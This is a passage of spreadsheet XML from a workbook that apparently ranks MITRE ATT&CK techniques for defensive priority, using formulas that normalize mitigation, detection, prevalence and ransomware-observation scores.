        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.7000000000000011</v>
      </c>
      <c r="AR69" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS69" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT69" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU6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70" spans="1:47" ht="68">
      <c r="A70" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B70" s="37">
        <f t="shared" si="1"/>
        <v>90.836763095238084</v>
      </c>
      <c r="C70" s="37" t="s">
        <v>274</v>
      </c>
      <c r="D70" s="50" t="s">
        <v>275</v>
      </c>
      <c r="E70" s="37"/>
      <c r="F70" s="37">
        <v>2</v>
      </c>
      <c r="G70" s="37">
        <v>1</v>
      </c>
      <c r="H70" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I70" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J70" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K70" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L70" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M70" s="37">
        <v>7.0660000000000002E-3</v>
      </c>
      <c r="N70" s="56">
        <v>0</v>
      </c>
      <c r="O70" s="56">
        <v>0</v>
      </c>
      <c r="P70" s="56">
        <v>5</v>
      </c>
      <c r="Q70" s="56">
        <v>2</v>
      </c>
      <c r="R70" s="57" t="s">
        <v>276</v>
      </c>
      <c r="S70" s="57">
        <v>7</v>
      </c>
      <c r="T70" s="57" t="s">
        <v>277</v>
      </c>
      <c r="U70" s="57">
        <v>9</v>
      </c>
      <c r="V70" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.18571423809523807</v>
      </c>
      <c r="W70" s="37">
        <v>16</v>
      </c>
      <c r="X70" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Y70" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Z70" s="37">
        <v>7</v>
      </c>
      <c r="AA70" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB70" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC70" s="37"/>
      <c r="AD70" s="50" t="s">
        <v>278</v>
      </c>
      <c r="AE70" s="37" t="str" cm="1">
        <f t="array" ref="AE70">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD70)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF70" s="37">
        <v>66</v>
      </c>
      <c r="AG70" s="37" t="str" cm="1">
        <f t="array" ref="AG70">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD70)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH70" s="37">
        <v>66</v>
      </c>
      <c r="AI70" s="37" t="str" cm="1">
        <f t="array" ref="AI70">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD70)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ70" s="37">
        <v>66</v>
      </c>
      <c r="AK70" s="37" t="str" cm="1">
        <f t="array" ref="AK70">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD70)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL70" s="37">
        <v>66</v>
      </c>
      <c r="AM70" s="37" t="str" cm="1">
        <f t="array" ref="AM70">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD70)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN70" s="37">
        <v>0</v>
      </c>
      <c r="AO70" s="37">
        <v>1</v>
      </c>
      <c r="AP70" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ70" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>30.278921031746027</v>
      </c>
      <c r="AR70" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS70" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT70" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU7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0.74473621504157217</v>
      </c>
    </row>
    <row r="71" spans="1:47" ht="51">
      <c r="A71" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B71" s="37">
        <f t="shared" si="1"/>
        <v>40.990412142857146</v>
      </c>
      <c r="C71" s="37" t="s">
        <v>279</v>
      </c>
      <c r="D71" s="50" t="s">
        <v>275</v>
      </c>
      <c r="E71" s="37" t="s">
        <v>280</v>
      </c>
      <c r="F71" s="37">
        <v>1</v>
      </c>
      <c r="G71" s="37">
        <v>1</v>
      </c>
      <c r="H71" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I71" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J71" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K71" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L71" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M71" s="37">
        <v>0</v>
      </c>
      <c r="N71" s="56">
        <v>2</v>
      </c>
      <c r="O71" s="56">
        <v>2</v>
      </c>
      <c r="P71" s="56">
        <v>0</v>
      </c>
      <c r="Q71" s="56">
        <v>1</v>
      </c>
      <c r="R71" s="57">
        <v>4.0999999999999996</v>
      </c>
      <c r="S71" s="57">
        <v>1</v>
      </c>
      <c r="T71" s="57" t="s">
        <v>281</v>
      </c>
      <c r="U71" s="57">
        <v>2</v>
      </c>
      <c r="V71" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>5.2380714285714287E-2</v>
      </c>
      <c r="W71" s="37">
        <v>3</v>
      </c>
      <c r="X71" s="37">
        <v>5.4545000000000003E-2</v>
      </c>
      <c r="Y71" s="37">
        <v>5.4545000000000003E-2</v>
      </c>
      <c r="Z71" s="37">
        <v>5</v>
      </c>
      <c r="AA71" s="37">
        <v>0.05</v>
      </c>
      <c r="AB71" s="37">
        <v>0.05</v>
      </c>
      <c r="AC71" s="37"/>
      <c r="AD71" s="50" t="s">
        <v>282</v>
      </c>
      <c r="AE71" s="37" t="str" cm="1">
        <f t="array" ref="AE71">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD71)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF71" s="37">
        <v>67</v>
      </c>
      <c r="AG71" s="37" t="str" cm="1">
        <f t="array" ref="AG71">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD71)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH71" s="37">
        <v>67</v>
      </c>
      <c r="AI71" s="37" t="str" cm="1">
        <f t="array" ref="AI71">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD71)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ71" s="37">
        <v>67</v>
      </c>
      <c r="AK71" s="37" t="str" cm="1">
        <f t="array" ref="AK71">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD71)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL71" s="37">
        <v>67</v>
      </c>
      <c r="AM71" s="37" t="str" cm="1">
        <f t="array" ref="AM71">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD71)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN71" s="37">
        <v>0</v>
      </c>
      <c r="AO71" s="37">
        <v>2</v>
      </c>
      <c r="AP71" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ71" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>13.663470714285715</v>
      </c>
      <c r="AR71" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS71" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT71" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU7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0.69826051020408153</v>
      </c>
    </row>
    <row r="72" spans="1:47" ht="34">
      <c r="A72" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B72" s="37">
        <f t="shared" si="1"/>
        <v>63.699935000000004</v>
      </c>
      <c r="C72" s="37" t="s">
        <v>283</v>
      </c>
      <c r="D72" s="50" t="s">
        <v>275</v>
      </c>
      <c r="E72" s="37" t="s">
        <v>284</v>
      </c>
      <c r="F72" s="37">
        <v>1</v>
      </c>
      <c r="G72" s="37">
        <v>1</v>
      </c>
      <c r="H72" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I72" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J72" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K72" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L72" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M72" s="37">
        <v>0</v>
      </c>
      <c r="N72" s="56">
        <v>0</v>
      </c>
      <c r="O72" s="56">
        <v>0</v>
      </c>
      <c r="P72" s="56">
        <v>0</v>
      </c>
      <c r="Q72" s="56">
        <v>0</v>
      </c>
      <c r="R72" s="57" t="s">
        <v>276</v>
      </c>
      <c r="S72" s="57">
        <v>7</v>
      </c>
      <c r="T72" s="57" t="s">
        <v>285</v>
      </c>
      <c r="U72" s="57">
        <v>7</v>
      </c>
      <c r="V72" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.13333309523809525</v>
      </c>
      <c r="W72" s="37">
        <v>14</v>
      </c>
      <c r="X72" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y72" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z72" s="37">
        <v>0</v>
      </c>
      <c r="AA72" s="37">
        <v>0</v>
      </c>
      <c r="AB72" s="37">
        <v>0</v>
      </c>
      <c r="AC72" s="37"/>
      <c r="AD72" s="50" t="s">
        <v>286</v>
      </c>
      <c r="AE72" s="37" t="str" cm="1">
        <f t="array" ref="AE72">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD72)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF72" s="37">
        <v>68</v>
      </c>
      <c r="AG72" s="37" t="str" cm="1">
        <f t="array" ref="AG72">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD72)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH72" s="37">
        <v>68</v>
      </c>
      <c r="AI72" s="37" t="str" cm="1">
        <f t="array" ref="AI72">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD72)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ72" s="37">
        <v>68</v>
      </c>
      <c r="AK72" s="37" t="str" cm="1">
        <f t="array" ref="AK72">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD72)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL72" s="37">
        <v>68</v>
      </c>
      <c r="AM72" s="37" t="str" cm="1">
        <f t="array" ref="AM72">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD72)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN72" s="37">
        <v>0</v>
      </c>
      <c r="AO72" s="37">
        <v>1</v>
      </c>
      <c r="AP72" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ72" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>21.233311666666669</v>
      </c>
      <c r="AR72" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS72" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT72" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU7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0.52936456349206351</v>
      </c>
    </row>
    <row r="73" spans="1:47" ht="51">
      <c r="A73" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B73" s="37">
        <f t="shared" si="1"/>
        <v>64.63326738095239</v>
      </c>
      <c r="C73" s="37" t="s">
        <v>287</v>
      </c>
      <c r="D73" s="50" t="s">
        <v>275</v>
      </c>
      <c r="E73" s="37" t="s">
        <v>288</v>
      </c>
      <c r="F73" s="37">
        <v>1</v>
      </c>
      <c r="G73" s="37">
        <v>1</v>
      </c>
      <c r="H73" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I73" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J73" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K73" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L73" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M73" s="37">
        <v>0</v>
      </c>
      <c r="N73" s="56">
        <v>0</v>
      </c>
      <c r="O73" s="56">
        <v>0</v>
      </c>
      <c r="P73" s="56">
        <v>0</v>
      </c>
      <c r="Q73" s="56">
        <v>0</v>
      </c>
      <c r="R73" s="57" t="s">
        <v>276</v>
      </c>
      <c r="S73" s="57">
        <v>7</v>
      </c>
      <c r="T73" s="57" t="s">
        <v>285</v>
      </c>
      <c r="U73" s="57">
        <v>7</v>
      </c>
      <c r="V73" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.13333309523809525</v>
      </c>
      <c r="W73" s="37">
        <v>14</v>
      </c>
      <c r="X73" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y73" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z73" s="37">
        <v>0</v>
      </c>
      <c r="AA73" s="37">
        <v>0</v>
      </c>
      <c r="AB73" s="37">
        <v>0</v>
      </c>
      <c r="AC73" s="37"/>
      <c r="AD73" s="50" t="s">
        <v>289</v>
      </c>
      <c r="AE73" s="37" t="str" cm="1">
        <f t="array" ref="AE73">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD73)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF73" s="37">
        <v>69</v>
      </c>
      <c r="AG73" s="37" t="str" cm="1">
        <f t="array" ref="AG73">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD73)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH73" s="37">
        <v>69</v>
      </c>
      <c r="AI73" s="37" t="str" cm="1">
        <f t="array" ref="AI73">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD73)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ73" s="37">
        <v>69</v>
      </c>
      <c r="AK73" s="37" t="str" cm="1">
        <f t="array" ref="AK73">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD73)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL73" s="37">
        <v>69</v>
      </c>
      <c r="AM73" s="37" t="str" cm="1">
        <f t="array" ref="AM73">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD73)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN73" s="37">
        <v>0</v>
      </c>
      <c r="AO73" s="37">
        <v>0</v>
      </c>
      <c r="AP73" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ73" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>21.544422460317463</v>
      </c>
      <c r="AR73" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS73" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT73" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU7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74" spans="1:47" ht="34">
      <c r="A74" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B74" s="37">
        <f t="shared" si="1"/>
        <v>69.580885476190488</v>
      </c>
      <c r="C74" s="37" t="s">
        <v>290</v>
      </c>
      <c r="D74" s="50" t="s">
        <v>275</v>
      </c>
      <c r="E74" s="37" t="s">
        <v>291</v>
      </c>
      <c r="F74" s="37">
        <v>1</v>
      </c>
      <c r="G74" s="37">
        <v>1</v>
      </c>
      <c r="H74" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I74" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J74" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K74" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L74" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M74" s="37">
        <v>0</v>
      </c>
      <c r="N74" s="56">
        <v>0</v>
      </c>
      <c r="O74" s="56">
        <v>0</v>
      </c>
      <c r="P74" s="56">
        <v>2</v>
      </c>
      <c r="Q74" s="56">
        <v>1</v>
      </c>
      <c r="R74" s="57" t="s">
        <v>276</v>
      </c>
      <c r="S74" s="57">
        <v>7</v>
      </c>
      <c r="T74" s="57" t="s">
        <v>285</v>
      </c>
      <c r="U74" s="57">
        <v>7</v>
      </c>
      <c r="V74" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.14761880952380954</v>
      </c>
      <c r="W74" s="37">
        <v>14</v>
      </c>
      <c r="X74" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y74" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z74" s="37">
        <v>3</v>
      </c>
      <c r="AA74" s="37">
        <v>0.03</v>
      </c>
      <c r="AB74" s="37">
        <v>0.03</v>
      </c>
      <c r="AC74" s="37"/>
      <c r="AD74" s="50" t="s">
        <v>286</v>
      </c>
      <c r="AE74" s="37" t="str" cm="1">
        <f t="array" ref="AE74">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD74)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF74" s="37">
        <v>70</v>
      </c>
      <c r="AG74" s="37" t="str" cm="1">
        <f t="array" ref="AG74">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD74)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH74" s="37">
        <v>70</v>
      </c>
      <c r="AI74" s="37" t="str" cm="1">
        <f t="array" ref="AI74">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD74)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ74" s="37">
        <v>70</v>
      </c>
      <c r="AK74" s="37" t="str" cm="1">
        <f t="array" ref="AK74">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD74)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL74" s="37">
        <v>70</v>
      </c>
      <c r="AM74" s="37" t="str" cm="1">
        <f t="array" ref="AM74">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD74)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN74" s="37">
        <v>0</v>
      </c>
      <c r="AO74" s="37">
        <v>0</v>
      </c>
      <c r="AP74" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ74" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>23.193628492063496</v>
      </c>
      <c r="AR74" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS74" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT74" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
